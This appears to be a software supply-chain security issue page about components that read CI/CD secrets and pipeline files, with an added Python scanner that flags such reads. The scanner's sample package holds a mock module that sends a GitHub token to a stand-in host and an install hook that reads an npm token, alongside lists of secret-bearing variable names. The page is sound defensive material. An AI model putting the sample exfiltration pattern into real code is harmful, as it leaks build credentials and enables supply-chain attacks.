TH16131
Detected presence of software components that can access sensitive build pipeline configuration.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
|  | pass | high | high | None | None |
About the issue
Software components sometimes need to interact with sensitive parts of the runtime environment, and often require privileged access to accomplish a task. Build pipeline configuration includes high-value information such as:
- CI/CD platform secrets and tokens
- pipeline definition files and runner configuration
- build-time environment variables that carry signing keys or deploy credentials
- artifact registry and package publishing credentials
Continuous integration and delivery systems rely on that information to build, sign and publish software. Attackers abuse access to build pipeline configuration to harvest secrets from build environments; the harvested secrets can then be exfiltrated to attacker-controlled infrastructure and used to tamper with software releases or to publish malicious artifacts under trusted identities. The presence of code that accesses build pipeline configuration does not by itself imply malicious intent, but every such use in a software package should be documented and approved. Only select software components have a legitimate reason to read build pipeline configuration. One example of acceptable use is release tooling that reads publishing credentials to push artifacts.
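As an added example of the kind of check a reviewer can run over a package before approving a detection, the script below flags source lines that read secret-bearing CI/CD environment variables or pipeline configuration files, then separates findings in components that were already reviewed (such as release tooling) from the rest. This is illustrative code, not Spectra Assure's detection logic or any project's own code; the variable names, configuration paths and the sample package are assumptions chosen for the demonstration.

```python
"""Added example (not Spectra Assure's detection logic): a minimal static
check that flags source lines reading CI/CD secret-bearing environment
variables or pipeline definition files, then separates findings in
approved components from the rest. The variable names, file paths and
sample package below are assumptions chosen for illustration."""
import re
from dataclasses import dataclass

# Environment variables that commonly carry CI/CD platform tokens,
# signing keys or publishing credentials (assumed list, not exhaustive).
SENSITIVE_ENV_VARS = frozenset({
    "GITHUB_TOKEN", "ACTIONS_RUNTIME_TOKEN", "CI_JOB_TOKEN", "NPM_TOKEN",
    "PYPI_TOKEN", "TWINE_PASSWORD", "NUGET_API_KEY", "AWS_SECRET_ACCESS_KEY",
    "DOCKER_PASSWORD", "GPG_PRIVATE_KEY", "SIGNING_KEY",
})

# Pipeline definition, runner and registry configuration paths (assumed).
PIPELINE_FILES = (
    ".github/workflows/", ".gitlab-ci.yml", ".circleci/config.yml",
    "Jenkinsfile", "azure-pipelines.yml", ".travis.yml",
    "bitbucket-pipelines.yml", ".npmrc", ".pypirc",
)

# Idioms that read the process environment in common build languages.
ENV_ACCESS_HINT = re.compile(
    r"os\.environ|os\.getenv|process\.env|System\.getenv|ENV\[|\$env:|getenv\("
)


@dataclass(frozen=True)
class Finding:
    path: str        # file inside the package
    line: int        # 1-based line number
    kind: str        # "env" or "pipeline_file"
    detail: str      # variable name or config path that was touched


def scan_file(path: str, text: str) -> list[Finding]:
    """Return every line of `text` that reads a sensitive env var or a
    pipeline configuration file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if ENV_ACCESS_HINT.search(line):
            for var in sorted(SENSITIVE_ENV_VARS):
                if re.search(rf"\b{re.escape(var)}\b", line):
                    findings.append(Finding(path, lineno, "env", var))
        for cfg in PIPELINE_FILES:
            if cfg in line:
                findings.append(Finding(path, lineno, "pipeline_file", cfg))
    return findings


def scan_package(files: dict[str, str]) -> list[Finding]:
    """Scan a mapping of relative path -> file contents, in path order."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_file(path, files[path]))
    return findings


def unapproved_findings(findings, approved_paths):
    """Drop findings in components that were reviewed and approved
    (for example release tooling), leaving what still needs a look."""
    approved = set(approved_paths)
    return [f for f in findings if f.path not in approved]


# Constructed sample package: one approved publisher and two components
# that have no business touching pipeline secrets.
SAMPLE_PACKAGE = {
    "setup.py": "from setuptools import setup\nsetup(name='demo', version='1.0.0')\n",
    "tools/release.py": (
        "import os\n"
        "# approved: uploads the wheel with the project's publishing token\n"
        "token = os.environ['PYPI_TOKEN']\n"
    ),
    "demo/telemetry.py": (
        "import os, urllib.request\n"
        "gh = os.getenv('GITHUB_TOKEN')\n"
        "aws = os.environ.get('AWS_SECRET_ACCESS_KEY')\n"
        "wf = open('.github/workflows/release.yml').read()\n"
        "urllib.request.urlopen('https://example.invalid/c', data=(gh or '').encode())\n"
    ),
    "postinstall.js": (
        "const t = process.env.NPM_TOKEN;\n"
        "const rc = require('fs').readFileSync('.npmrc');\n"
    ),
}
APPROVED = {"tools/release.py"}

if __name__ == "__main__":
    for f in unapproved_findings(scan_package(SAMPLE_PACKAGE), APPROVED):
        print(f"{f.path}:{f.line}: {f.kind} {f.detail}")
```

The approved-paths list is the point of the exercise: the release script reads `PYPI_TOKEN` for a documented reason and drops out of the report, while a telemetry module and an install hook that read platform tokens and pipeline files remain, which is exactly the pattern to treat as a tampering indicator until someone explains it.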
How to resolve the issue
- Investigate reported detections as indicators of software tampering.
- Consult the MITRE ATT&CK documentation: T1072 - Software Deployment Tools.
- Consider rewriting the flagged code without using the marked behaviors.
Incidence statistics
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total number of packages analyzed
- Linux: 562K
- NPM: 5.12M
- NuGet: 735K
- PS Gallery: 17K
- PyPI: 838K
- RubyGems: 203K
- VS Code: 113K
- Windows: 3.7K
Recommended reading
- Software Deployment Tools (External resource)